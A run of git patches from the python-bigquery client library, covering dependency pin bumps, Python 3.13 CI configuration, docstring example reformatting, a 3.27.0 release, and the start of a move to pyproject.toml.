+pyasn1==0.6.1 \ + --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ + --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 # via # pyasn1-modules # rsa -pyasn1-modules==0.4.0 \ - --hash=sha256:831dbcea1b177b28c9baddf4c6d1013c24c3accd14a1873fffaa6a2e905f17b6 \ - --hash=sha256:be04f15b66c206eed667e0bb5ab27e2b1855ea54a842e5037738099e8ca4ae0b +pyasn1-modules==0.4.1 \ + --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ + --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c # via google-auth pycparser==2.22 \ --hash=sha256:491c8be9c040f5390f5bf44a5b07752bd07f56edf992381b05c701439eec10f6 \ @@ -449,9 +419,9 @@ pygments==2.18.0 \ # via # readme-renderer # rich -pyjwt==2.8.0 \ - --hash=sha256:57e28d156e3d5c10088e0c68abb90bfac3df82b40a71bd0daa20c65ccd5c23de \ - --hash=sha256:59127c392cc44c2da5bb3192169a91f429924e17aff6534d70fdc02ab3e04320 +pyjwt==2.9.0 \ + --hash=sha256:3b02fb0f44517787776cf48f2ae25d8e14f300e6d7545a4315cee571a415e850 \ + --hash=sha256:7e1e5b56cc735432a7369cbfa0efe50fa113ebecdc04ae6922deba8b84582d0c # via gcp-releasetool pyperclip==1.9.0 \ --hash=sha256:b7de0142ddc81bfc5c7507eea19da920b92252b548b96186caf94a5e2527d310 @@ -481,9 +451,9 @@ rfc3986==2.0.0 \ --hash=sha256:50b1502b60e289cb37883f3dfd34532b8873c7de9f49bb546641ce9cbd256ebd \ --hash=sha256:97aacf9dbd4bfd829baad6e6309fa6573aaf1be3f6fa735c8ab05e46cecb261c # via twine -rich==13.7.1 \ - --hash=sha256:4edbae314f59eb482f54e9e30bf00d33350aaa94f4bfcd4e9e3110e64d0d7222 \ - --hash=sha256:9be308cb1fe2f1f57d67ce99e95af38a1e2bc71ad9813b0e247cf7ffbcc3a432 +rich==13.9.2 \ + --hash=sha256:51a2c62057461aaf7152b4d611168f93a9fc73068f8ded2790f29fe2b5366d0c \ + --hash=sha256:8c82a3d3f8dcfe9e734771313e606b39d8247bb6b826e196f4914b333b743cf1 # via twine rsa==4.9 \ --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ @@ -499,9 +469,9 @@ six==1.16.0 \ # via # gcp-docuploader # python-dateutil -tomli==2.0.1 \ - --hash=sha256:939de3e7a6161af0c887ef91b7d41a53e7c5a1ca976325f429cb46ea9bc30ecc \ - --hash=sha256:de526c12914f0c550d15924c62d72abc48d6fe7364aa87328337a31007fe8a4f +tomli==2.0.2 \ + --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ + --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed # via nox twine==5.1.1 \ --hash=sha256:215dbe7b4b94c2c50a7315c0275d2258399280fbb7d04182c7e55e24b5f93997 \ @@ -510,28 +480,30 @@ twine==5.1.1 \ typing-extensions==4.12.2 \ --hash=sha256:04e5ca0351e0f3f85c6853954072df659d0d13fac324d0072316b67d7794700d \ --hash=sha256:1a7ead55c7e559dd4dee8856e3a88b41225abfe1ce8df57b7c13915fe121ffb8 - # via -r requirements.in -urllib3==2.2.2 \ - --hash=sha256:a448b2f64d686155468037e1ace9f2d2199776e17f0a46610480d311f73e3472 \ - --hash=sha256:dd505485549a7a552833da5e6063639d0d177c04f23bc3864e41e5dc5f612168 + # via + # -r requirements.in + # rich +urllib3==2.2.3 \ + --hash=sha256:ca899ca043dcb1bafa3e262d73aa25c465bfb49e0bd9dd5d59f1d0acba2f8fac \ + --hash=sha256:e7d814a81dad81e6caf2ec9fdedb284ecc9c73076b62654547cc64ccdcae26e9 # via # requests # twine -virtualenv==20.26.3 \ - --hash=sha256:4c43a2a236279d9ea36a0d76f98d84bd6ca94ac4e0f4a3b9d46d05e10fea542a \ - --hash=sha256:8cc4a31139e796e9a7de2cd5cf2489de1217193116a8fd42328f1bd65f434589 +virtualenv==20.26.6 \ + --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ + --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 # via nox -wheel==0.43.0 \ - --hash=sha256:465ef92c69fa5c5da2d1cf8ac40559a8c940886afcef87dcf14b9470862f1d85 \ - --hash=sha256:55c570405f142630c6b9f72fe09d9b67cf1477fcf543ae5b8dcb1f5b7377da81 +wheel==0.44.0 \ + --hash=sha256:2376a90c98cc337d18623527a97c31797bd02bad0033d41547043a1cbfbe448f \ + --hash=sha256:a29c3f2817e95ab89aa4660681ad547c0e9547f20e75b0562fe7723c9a2a9d49 # via -r requirements.in -zipp==3.19.2 \ - --hash=sha256:bf1dcf6450f873a13e952a29504887c89e6de7506209e5b1bcc3460135d4de19 \ - --hash=sha256:f091755f667055f2d02b32c53771a7a6c8b47e1fdbc4b72a8b9072b3eef8015c +zipp==3.20.2 \ + --hash=sha256:a817ac80d6cf4b23bf7f2828b7cabf326f15a001bea8b1f9b49631780ba28350 \ + --hash=sha256:bc9eb26f4506fda01b81bcde0ca78103b6e62f991b381fec825435c836edbc29 # via importlib-metadata # The following packages are considered to be unsafe in a requirements file: -setuptools==70.2.0 \ - --hash=sha256:b8b8060bb426838fbe942479c90296ce976249451118ef566a5a0b7d8b78fb05 \ - --hash=sha256:bd63e505105011b25c3c11f753f7e3b8465ea739efddaccef8f0efac2137bac1 +setuptools==75.1.0 \ + --hash=sha256:35ab7fd3bcd95e6b7fd704e4a1539513edad446c097797f2985e0e4b960772f2 \ + --hash=sha256:d59a21b17a275fb872a9c3dae73963160ae079f1049ed956880cd7c09b120538 # via -r requirements.in diff --git a/.kokoro/samples/python3.13/common.cfg b/.kokoro/samples/python3.13/common.cfg new file mode 100644 index 000000000..ee9688995 --- /dev/null +++ b/.kokoro/samples/python3.13/common.cfg @@ -0,0 +1,40 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +# Build logs will be here +action { + define_artifacts { + regex: "**/*sponge_log.xml" + } +} + +# Specify which tests to run +env_vars: { + key: "RUN_TESTS_SESSION" + value: "py-3.13" +} + +# Declare build specific Cloud project. +env_vars: { + key: "BUILD_SPECIFIC_GCLOUD_PROJECT" + value: "python-docs-samples-tests-313" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples.sh" +} + +# Configure the docker image for kokoro-trampoline. +env_vars: { + key: "TRAMPOLINE_IMAGE" + value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" +} + +# Download secrets for samples +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" + +# Download trampoline resources. +gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" + +# Use the trampoline script to run in docker. +build_file: "python-bigquery/.kokoro/trampoline_v2.sh" diff --git a/.kokoro/samples/python3.13/continuous.cfg b/.kokoro/samples/python3.13/continuous.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.13/continuous.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/.kokoro/samples/python3.13/periodic-head.cfg b/.kokoro/samples/python3.13/periodic-head.cfg new file mode 100644 index 000000000..5aa01bab5 --- /dev/null +++ b/.kokoro/samples/python3.13/periodic-head.cfg @@ -0,0 +1,11 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} + +env_vars: { + key: "TRAMPOLINE_BUILD_FILE" + value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" +} diff --git a/.kokoro/samples/python3.13/periodic.cfg b/.kokoro/samples/python3.13/periodic.cfg new file mode 100644 index 000000000..71cd1e597 --- /dev/null +++ b/.kokoro/samples/python3.13/periodic.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "False" +} diff --git a/.kokoro/samples/python3.13/presubmit.cfg b/.kokoro/samples/python3.13/presubmit.cfg new file mode 100644 index 000000000..a1c8d9759 --- /dev/null +++ b/.kokoro/samples/python3.13/presubmit.cfg @@ -0,0 +1,6 @@ +# Format: //devtools/kokoro/config/proto/build.proto + +env_vars: { + key: "INSTALL_LIBRARY_FROM_SOURCE" + value: "True" +} \ No newline at end of file diff --git a/.kokoro/test-samples-impl.sh b/.kokoro/test-samples-impl.sh index 55910c8ba..53e365bc4 100755 --- a/.kokoro/test-samples-impl.sh +++ b/.kokoro/test-samples-impl.sh @@ -33,7 +33,8 @@ export PYTHONUNBUFFERED=1 env | grep KOKORO # Install nox -python3.9 -m pip install --upgrade --quiet nox +# `virtualenv==20.26.6` is added for Python 3.7 compatibility +python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6 # Use secrets acessor service account to get secrets if [[ -f "${KOKORO_GFILE_DIR}/secrets_viewer_service_account.json" ]]; then diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index 7be61e6b6..1900c5e36 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -22,7 +22,7 @@ In order to add a feature: documentation. - The feature must work fully on the following CPython versions: - 3.7, 3.8, 3.9, 3.10, 3.11 and 3.12 on both UNIX and Windows. + 3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. - The feature must not add unnecessary dependencies (where "unnecessary" is of course subjective, but new dependencies should @@ -72,7 +72,7 @@ We use `nox `__ to instrument our tests. - To run a single unit test:: - $ nox -s unit-3.12 -- -k + $ nox -s unit-3.13 -- -k .. note:: @@ -227,6 +227,7 @@ We support: - `Python 3.10`_ - `Python 3.11`_ - `Python 3.12`_ +- `Python 3.13`_ .. _Python 3.7: https://docs.python.org/3.7/ .. _Python 3.8: https://docs.python.org/3.8/ @@ -234,6 +235,7 @@ We support: .. _Python 3.10: https://docs.python.org/3.10/ .. _Python 3.11: https://docs.python.org/3.11/ .. _Python 3.12: https://docs.python.org/3.12/ +.. _Python 3.13: https://docs.python.org/3.13/ Supported versions can be found in our ``noxfile.py`` `config`_. diff --git a/samples/desktopapp/noxfile.py b/samples/desktopapp/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/desktopapp/noxfile.py +++ b/samples/desktopapp/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/geography/noxfile.py b/samples/geography/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/geography/noxfile.py +++ b/samples/geography/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/magics/noxfile.py b/samples/magics/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/magics/noxfile.py +++ b/samples/magics/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/notebooks/noxfile.py b/samples/notebooks/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/notebooks/noxfile.py +++ b/samples/notebooks/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] diff --git a/samples/snippets/noxfile.py b/samples/snippets/noxfile.py index 3b7135946..c9a3d1ecb 100644 --- a/samples/snippets/noxfile.py +++ b/samples/snippets/noxfile.py @@ -89,7 +89,7 @@ def get_pytest_env_vars() -> Dict[str, str]: # DO NOT EDIT - automatically generated. # All versions used to test samples. -ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12"] +ALL_VERSIONS = ["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"] # Any default versions that should be ignored. IGNORED_VERSIONS = TEST_CONFIG["ignored_versions"] From fef8b886bc86d355c7745585fc53dc8a5a019ab1 Mon Sep 17 00:00:00 2001 From: "Leah E. Cole" <6719667+leahecole@users.noreply.github.com> Date: Fri, 1 Nov 2024 12:53:52 -0400 Subject: [PATCH 023/202] chore: two fixit fixes (#2050) --- google/cloud/bigquery/client.py | 34 ++++++++++++++++++--------------- 1 file changed, 19 insertions(+), 15 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 1c222f2dd..52c5084e3 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -328,6 +328,15 @@ def get_service_account_email( ) -> str: """Get the email address of the project's BigQuery service account + Example: + + .. code-block:: python + + from google.cloud import bigquery + client = bigquery.Client() + client.get_service_account_email() + # returns an email similar to: my_service_account@my-project.iam.gserviceaccount.com + Note: This is the service account that BigQuery uses to manage tables encrypted by a key in KMS. @@ -345,13 +354,6 @@ def get_service_account_email( str: service account email address - Example: - - >>> from google.cloud import bigquery - >>> client = bigquery.Client() - >>> client.get_service_account_email() - my_service_account@my-project.iam.gserviceaccount.com - """ if project is None: project = self.project @@ -629,9 +631,19 @@ def create_dataset( ) -> Dataset: """API call: create the dataset via a POST request. + See https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/insert + Example: + + .. code-block:: python + + from google.cloud import bigquery + client = bigquery.Client() + dataset = bigquery.Dataset('my_project.my_dataset') + dataset = client.create_dataset(dataset) + Args: dataset (Union[ \ google.cloud.bigquery.dataset.Dataset, \ @@ -658,14 +670,6 @@ def create_dataset( Raises: google.cloud.exceptions.Conflict: If the dataset already exists. - - Example: - - >>> from google.cloud import bigquery - >>> client = bigquery.Client() - >>> dataset = bigquery.Dataset('my_project.my_dataset') - >>> dataset = client.create_dataset(dataset) - """ dataset = self._dataset_from_arg(dataset) if isinstance(dataset, DatasetReference): From 53c289e032caf083505b33bef323878671b58cd9 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 7 Nov 2024 10:17:28 -0500 Subject: [PATCH 024/202] chore(main): release 3.27.0 (#2040) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> Co-authored-by: Chalmer Lowe --- CHANGELOG.md | 7 +++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 5de99a6ca..989b7f020 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,13 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.27.0](https://github.com/googleapis/python-bigquery/compare/v3.26.0...v3.27.0) (2024-11-01) + + +### Features + +* Updates to allow users to set max_stream_count ([#2039](https://github.com/googleapis/python-bigquery/issues/2039)) ([7372ad6](https://github.com/googleapis/python-bigquery/commit/7372ad659fd3316a602e90f224e9a3304d4c1419)) + ## [3.26.0](https://github.com/googleapis/python-bigquery/compare/v3.25.0...v3.26.0) (2024-09-25) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index ebc911253..8f4418777 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.26.0" +__version__ = "3.27.0" From a4d9534a900f13ae7355904cda05097d781f27e3 Mon Sep 17 00:00:00 2001 From: "Leah E. Cole" <6719667+leahecole@users.noreply.github.com> Date: Thu, 7 Nov 2024 15:56:57 -0500 Subject: [PATCH 025/202] docs: render fields correctly for update calls (#2055) --- google/cloud/bigquery/client.py | 82 ++++++++++++++++----------------- 1 file changed, 41 insertions(+), 41 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 52c5084e3..97f239f7a 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -1184,6 +1184,19 @@ def update_dataset( must be provided. If a field is listed in ``fields`` and is ``None`` in ``dataset``, it will be deleted. + For example, to update the default expiration times, specify + both properties in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_dataset( + dataset, + [ + "default_partition_expiration_ms", + "default_table_expiration_ms", + ] + ) + If ``dataset.etag`` is not ``None``, the update will only succeed if the dataset on the server has the same ETag. Thus reading a dataset with ``get_dataset``, changing its fields, @@ -1198,19 +1211,6 @@ def update_dataset( The properties of ``dataset`` to change. These are strings corresponding to the properties of :class:`~google.cloud.bigquery.dataset.Dataset`. - - For example, to update the default expiration times, specify - both properties in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_dataset( - dataset, - [ - "default_partition_expiration_ms", - "default_table_expiration_ms", - ] - ) retry (Optional[google.api_core.retry.Retry]): How to retry the RPC. timeout (Optional[float]): @@ -1254,6 +1254,15 @@ def update_model( must be provided. If a field is listed in ``fields`` and is ``None`` in ``model``, the field value will be deleted. + For example, to update the descriptive properties of the model, + specify them in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_model( + model, ["description", "friendly_name"] + ) + If ``model.etag`` is not ``None``, the update will only succeed if the model on the server has the same ETag. Thus reading a model with ``get_model``, changing its fields, and then passing it to @@ -1266,15 +1275,6 @@ def update_model( The properties of ``model`` to change. These are strings corresponding to the properties of :class:`~google.cloud.bigquery.model.Model`. - - For example, to update the descriptive properties of the model, - specify them in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_model( - model, ["description", "friendly_name"] - ) retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): @@ -1318,6 +1318,15 @@ def update_routine( must be provided. If a field is listed in ``fields`` and is ``None`` in ``routine``, the field value will be deleted. + For example, to update the description property of the routine, + specify it in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_routine( + routine, ["description"] + ) + .. warning:: During beta, partial updates are not supported. You must provide all fields in the resource. @@ -1336,15 +1345,6 @@ def update_routine( fields (Sequence[str]): The fields of ``routine`` to change, spelled as the :class:`~google.cloud.bigquery.routine.Routine` properties. - - For example, to update the description property of the routine, - specify it in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_routine( - routine, ["description"] - ) retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): @@ -1392,6 +1392,16 @@ def update_table( must be provided. If a field is listed in ``fields`` and is ``None`` in ``table``, the field value will be deleted. + For example, to update the descriptive properties of the table, + specify them in the ``fields`` argument: + + .. code-block:: python + + bigquery_client.update_table( + table, + ["description", "friendly_name"] + ) + If ``table.etag`` is not ``None``, the update will only succeed if the table on the server has the same ETag. Thus reading a table with ``get_table``, changing its fields, and then passing it to @@ -1403,16 +1413,6 @@ def update_table( fields (Sequence[str]): The fields of ``table`` to change, spelled as the :class:`~google.cloud.bigquery.table.Table` properties. - - For example, to update the descriptive properties of the table, - specify them in the ``fields`` argument: - - .. code-block:: python - - bigquery_client.update_table( - table, - ["description", "friendly_name"] - ) retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. timeout (Optional[float]): From 9050ddca47f703c2630a49b278f3f3779469f66f Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Mon, 11 Nov 2024 11:35:36 -0800 Subject: [PATCH 026/202] chore(python): remove obsolete release scripts and config files (#2057) Source-Link: https://github.com/googleapis/synthtool/commit/635751753776b1a7cabd4dcaa48013a96274372d Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:91d0075c6f2fd6a073a06168feee19fa2a8507692f2519a1dc7de3366d157e99 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 ++-- .github/release-trigger.yml | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 7672b49b6..b2770d4e0 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:5cddfe2fb5019bbf78335bc55f15bc13e18354a56b3ff46e1834f8e540807f05 -# created: 2024-10-31T01:41:07.349286254Z + digest: sha256:91d0075c6f2fd6a073a06168feee19fa2a8507692f2519a1dc7de3366d157e99 +# created: 2024-11-11T16:13:09.302418532Z diff --git a/.github/release-trigger.yml b/.github/release-trigger.yml index 4bb79e58e..b975c190d 100644 --- a/.github/release-trigger.yml +++ b/.github/release-trigger.yml @@ -1,2 +1,2 @@ enabled: true -multiScmName: +multiScmName: python-bigquery From 0277f171a2d12c370120e3e82199667ad40e1a99 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Tue, 12 Nov 2024 09:48:26 -0500 Subject: [PATCH 027/202] build: Use python 3.10 for docs session (#2058) Co-authored-by: Lingqing Gan --- noxfile.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/noxfile.py b/noxfile.py index 2376309ff..750a6b459 100644 --- a/noxfile.py +++ b/noxfile.py @@ -462,7 +462,7 @@ def blacken(session): session.run("black", *BLACK_PATHS) -@nox.session(python="3.9") +@nox.session(python="3.10") @_calculate_duration def docs(session): """Build the docs.""" From b2f33df4dd8627cab1571cde9f7f98a345fa6957 Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 12 Nov 2024 14:05:24 -0500 Subject: [PATCH 028/202] chore(python): update dependencies in .kokoro/docker/docs (#2060) Source-Link: https://github.com/googleapis/synthtool/commit/59171c8f83f3522ce186e4d110d27e772da4ba7a Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:2ed982f884312e4883e01b5ab8af8b6935f0216a5a2d82928d273081fc3be562 Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- .github/.OwlBot.lock.yaml | 4 ++-- .kokoro/docker/docs/requirements.txt | 20 ++++++++++---------- 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index b2770d4e0..6301519a9 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:91d0075c6f2fd6a073a06168feee19fa2a8507692f2519a1dc7de3366d157e99 -# created: 2024-11-11T16:13:09.302418532Z + digest: sha256:2ed982f884312e4883e01b5ab8af8b6935f0216a5a2d82928d273081fc3be562 +# created: 2024-11-12T12:09:45.821174897Z diff --git a/.kokoro/docker/docs/requirements.txt b/.kokoro/docker/docs/requirements.txt index 66eacc82f..8bb076459 100644 --- a/.kokoro/docker/docs/requirements.txt +++ b/.kokoro/docker/docs/requirements.txt @@ -1,5 +1,5 @@ # -# This file is autogenerated by pip-compile with Python 3.9 +# This file is autogenerated by pip-compile with Python 3.10 # by the following command: # # pip-compile --allow-unsafe --generate-hashes requirements.in @@ -8,9 +8,9 @@ argcomplete==3.5.1 \ --hash=sha256:1a1d148bdaa3e3b93454900163403df41448a248af01b6e849edc5ac08e6c363 \ --hash=sha256:eb1ee355aa2557bd3d0145de7b06b2a45b0ce461e1e7813f5d066039ab4177b4 # via nox -colorlog==6.8.2 \ - --hash=sha256:3e3e079a41feb5a1b64f978b5ea4f46040a94f11f0e8bbb8261e3dbbeca64d44 \ - --hash=sha256:4dcbb62368e2800cb3c5abd348da7e53f6c362dda502ec27c560b2e58a66bd33 +colorlog==6.9.0 \ + --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ + --hash=sha256:bfba54a1b93b94f54e1f4fe48395725a3d92fd2a4af702f6bd70946bdc0c6ac2 # via nox distlib==0.3.9 \ --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ @@ -24,9 +24,9 @@ nox==2024.10.9 \ --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 # via -r requirements.in -packaging==24.1 \ - --hash=sha256:026ed72c8ed3fcce5bf8950572258698927fd1dbda10a5e981cdf0ac37f4f002 \ - --hash=sha256:5b8f2217dbdbd2f7f384c41c628544e6d52f2d0f53c6d0c3ea61aa5d1d7ff124 +packaging==24.2 \ + --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ + --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f # via nox platformdirs==4.3.6 \ --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ @@ -36,7 +36,7 @@ tomli==2.0.2 \ --hash=sha256:2ebe24485c53d303f690b0ec092806a085f07af5a5aa1464f3931eec36caaa38 \ --hash=sha256:d46d457a85337051c36524bc5349dd91b1877838e2979ac5ced3e710ed8a60ed # via nox -virtualenv==20.26.6 \ - --hash=sha256:280aede09a2a5c317e409a00102e7077c6432c5a38f0ef938e643805a7ad2c48 \ - --hash=sha256:7345cc5b25405607a624d8418154577459c3e0277f5466dd79c49d5e492995f2 +virtualenv==20.27.1 \ + --hash=sha256:142c6be10212543b32c6c45d3d3893dff89112cc588b7d0879ae5a1ec03a47ba \ + --hash=sha256:f11f1b8a29525562925f745563bfd48b189450f61fb34c4f9cc79dd5aa32a1f4 # via nox From 106161180ead01aca1ead909cf06ca559f68666d Mon Sep 17 00:00:00 2001 From: Rin Arakaki Date: Wed, 13 Nov 2024 22:20:57 +0900 Subject: [PATCH 029/202] feat: migrate to pyproject.toml (#2041) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Migrate to pyproject.toml * Update * Add copyright notice * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update pyproject.toml --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- pyproject.toml | 104 +++++++++++++++++++++++++++++++ setup.py | 128 +-------------------------------------- tests/unit/test_table.py | 2 +- 3 files changed, 107 insertions(+), 127 deletions(-) create mode 100644 pyproject.toml diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 index 000000000..44a958323 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,104 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +[build-system] +requires = ["setuptools"] +build-backend = "setuptools.build_meta" + +[project] +name = "google-cloud-bigquery" +authors = [{ name = "Google LLC", email = "googleapis-packages@google.com" }] +license = { text = "Apache 2.0" } +requires-python = ">=3.7" +description = "Google BigQuery API client library" +readme = "README.rst" +classifiers = [ + # Should be one of: + # "Development Status :: 3 - Alpha" + # "Development Status :: 4 - Beta" + # "Development Status :: 5 - Production/Stable" + "Development Status :: 5 - Production/Stable", + "Intended Audience :: Developers", + "License :: OSI Approved :: Apache Software License", + "Programming Language :: Python", + "Programming Language :: Python :: 3", + "Programming Language :: Python :: 3.7", + "Programming Language :: Python :: 3.8", + "Programming Language :: Python :: 3.9", + "Programming Language :: Python :: 3.10", + "Programming Language :: Python :: 3.11", + "Programming Language :: Python :: 3.12", + "Operating System :: OS Independent", + "Topic :: Internet", +] +dependencies = [ + "google-api-core[grpc] >= 2.11.1, < 3.0.0dev", + "google-auth >= 2.14.1, < 3.0.0dev", + "google-cloud-core >= 2.4.1, < 3.0.0dev", + "google-resumable-media >= 2.0.0, < 3.0dev", + "packaging >= 20.0.0", + "python-dateutil >= 2.7.3, < 3.0dev", + "requests >= 2.21.0, < 3.0.0dev", +] +dynamic = ["version"] + +[project.urls] +Repository = "https://github.com/googleapis/python-bigquery" + 